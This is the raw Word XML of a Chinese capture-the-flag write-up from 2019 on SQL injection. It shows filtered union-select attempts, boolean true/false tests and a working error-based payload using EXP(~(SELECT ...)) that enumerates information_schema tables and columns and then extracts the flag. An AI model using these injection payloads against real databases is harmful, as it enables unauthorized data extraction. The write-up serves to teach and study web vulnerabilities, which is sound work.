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21677" w14:textId="77777777" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4274A5E0" w14:textId="77777777" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/*                程序作者：爱的伊苏                        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C69A1" w14:textId="77777777" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/*                程序完成时间：2019/1/5                    */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D0481" w14:textId="77777777" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/*                有任何问题请联系：740531307@qq.com        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2997D" w14:textId="77777777" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322714F9" w14:textId="77777777" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//@永远得意的笑下去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99F633" w14:textId="1068802E" w:rsidR="00E474C9" w:rsidRDefault="00E474C9"/>
    <w:p w14:paraId="140A1544" w14:textId="4BA89A26" w:rsidR="006A16EA" w:rsidRDefault="006A16EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F5B383E" wp14:editId="0DE3A1A5">
            <wp:extent cx="2590800" cy="2026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E6F09" wp14:editId="669B5C27">
            <wp:extent cx="2438400" cy="19126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4" cy="191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9DD6F" wp14:editId="518B27FB">
            <wp:extent cx="5274310" cy="1785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B6E5" w14:textId="7E92A68A" w:rsidR="006A16EA" w:rsidRDefault="006A16EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三种情况先实验，说应依旧可能存在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14:paraId="5B0C03FB" w14:textId="77018AB9" w:rsidR="006A16EA" w:rsidRDefault="006A16EA"/>
    <w:p w14:paraId="0C474A8D" w14:textId="57D34D6E" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:r w:rsidRPr="006446A2">
        <w:t>1'union select flag fro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t xml:space="preserve"> flag where 't'='t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133D38C" w14:textId="74CA6F28" w:rsidR="006A16EA" w:rsidRDefault="006A16EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03599E84" wp14:editId="2022DECF">
            <wp:extent cx="2301439" cy="166892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4812" w14:textId="5B453AB3" w:rsidR="006A16EA" w:rsidRDefault="006A16EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60817E3B" w14:textId="027B01BA" w:rsidR="006A16EA" w:rsidRDefault="006A16EA" w:rsidP="006A16EA">
      <w:r w:rsidRPr="006446A2">
        <w:t>1'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006446A2">
        <w:t xml:space="preserve">union </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t>fro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006446A2">
        <w:t xml:space="preserve"> where 't'='t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E9BC06" w14:textId="25208AA2" w:rsidR="006A16EA" w:rsidRDefault="006A16EA"/>
    <w:p w14:paraId="6C73241E" w14:textId="61E24D0B" w:rsidR="006A16EA" w:rsidRDefault="006A16EA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 xml:space="preserve">1' and '1'='1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回正确，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1' and '1'='2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>返回错误可知，当输入正确值的时候返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hello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lastRenderedPageBreak/>
        <w:t>输入错误值无显示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14:paraId="41B2832D" w14:textId="785F2990" w:rsidR="006A16EA" w:rsidRDefault="006A16EA"/>
    <w:p w14:paraId="75CA7FCE" w14:textId="67AD2D6F" w:rsidR="006A16EA" w:rsidRDefault="006A16EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是一个有报错的手注。</w:t>
      </w:r>
      <w:r w:rsidR="003E0D1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上网发现另外</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003E0D1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种手注方法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E0D1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE2414" w14:textId="63BF1336" w:rsidR="006A16EA" w:rsidRDefault="006A16E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'or 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EXP(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~(SELECT * from(select database())a))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450FDB2" w14:textId="7D39A0EF" w:rsidR="006A16EA" w:rsidRDefault="006A16EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D7FAE08" wp14:editId="25565CFA">
            <wp:extent cx="6235058" cy="403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539" cy="40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E0EB" w14:textId="3272C5D2" w:rsidR="006A16EA" w:rsidRDefault="006A16EA"/>
    <w:p w14:paraId="781BDF61" w14:textId="55AB0BFA" w:rsidR="006A16EA" w:rsidRDefault="006A16E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'or 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EXP(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~(SELECT * from(select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group_concat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information_schema.tables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table_schema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=database())a))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF75D4C" w14:textId="35C30088" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D"/>
    <w:p w14:paraId="14F825AB" w14:textId="1902BBAD" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="335722C8" wp14:editId="67C55961">
            <wp:extent cx="6483542" cy="4800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8292" cy="48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A2BC" w14:textId="078A0549" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D"/>
    <w:p w14:paraId="54F98388" w14:textId="10FC4A45" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对flag进行·查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2786B7A9" w14:textId="52404AFF" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:pPr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'or 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EXP(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~(SELECT * from(select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group_concat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information_schema.columns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='flag')a))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF499C" w14:textId="5CA9818F" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B3DDB7" wp14:editId="26426856">
            <wp:extent cx="6218619" cy="342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2448" cy="34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3057" w14:textId="77777777" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D"/>
    <w:p w14:paraId="6DDC2E60" w14:textId="2679D103" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对flag中的flag进行查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42347071" w14:textId="247D7015" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F2F2F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hd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>getflag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'or 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EXP(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 xml:space="preserve">~(SELECT * from(select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group_concat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(flag) from flag)a))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41923E" w14:textId="78D044B8" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064874D8" wp14:editId="3F3BEBC2">
            <wp:extent cx="6386317" cy="525145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8628" cy="5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3F7A" w14:textId="1B5B5875" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到最终结果！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5D35C8" w14:textId="04E509C2" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D"/>
    <w:p w14:paraId="61B4119F" w14:textId="71671484" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D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exp() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t>函数计算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e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDFCF8"/>
        </w:rPr>
        <w:t>的指数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E79D8" w14:textId="01417D8D" w:rsidR="003E0D1D" w:rsidRPr="006D30AF" w:rsidRDefault="006D30AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每一个派生表必须有自己的别名</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1D6C880B" w14:textId="77777777" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECE1AB9" w14:textId="5950C9DA" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后记：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5C99FF" w14:textId="57460EB5" w:rsidR="003E0D1D" w:rsidRDefault="003E0D1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看不同人的writeup感受到不同人的风格迥异。就如同星际争霸一样，各种战术</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>透露着</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你对于（游戏的理解&amp;&amp;个人的个性）在这里一样适用。第三个用大家的方法一个比一个复杂，但是我看到这个方法以后还是惊异于原来还是可以这么简单。这大概是个人的性格与技术的沉淀与一点点运气共同造成的。对于各位将writeup发出来的大佬致以最诚挚的敬意。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2090D44E" w14:textId="77777777" w:rsidR="003E0D1D" w:rsidRPr="006A16EA" w:rsidRDefault="003E0D1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003E0D1D" w:rsidRPr="006A1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9F"/>
    <w:rsid w:val="001938D0"/>
    <w:rsid w:val="003E0D1D"/>
    <w:rsid w:val="006A16EA"/>
    <w:rsid w:val="006D30AF"/>
    <w:rsid w:val="00861D9F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4FA7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D7BDB10-B5EC-4DCB-87A9-7C7C14C4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6EA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D30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30A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6D30A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3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2019-01-05T10:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-05T11:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>